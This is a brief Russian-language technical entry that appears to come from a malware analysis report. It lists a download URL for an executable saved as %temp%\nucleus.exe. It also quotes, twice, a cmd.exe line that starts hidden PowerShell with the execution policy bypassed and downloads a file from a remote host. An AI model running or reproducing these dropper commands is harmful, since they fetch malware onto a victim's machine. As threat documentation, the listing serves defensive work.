Техническая информация
- http://w2afipbza0zj.pw/blog/wnx0bykhutp2.exe как %temp%\nucleus.exe
- '<SYSTEM32>\cmd.exe' /c cd respondentroundtablecoconutdozenKovacspileregretHewett & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://...
- '<SYSTEM32>\cmd.exe' /c cd respondentroundtablecoconutdozenKovacspileregretHewett & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://...' (со скрытым окном)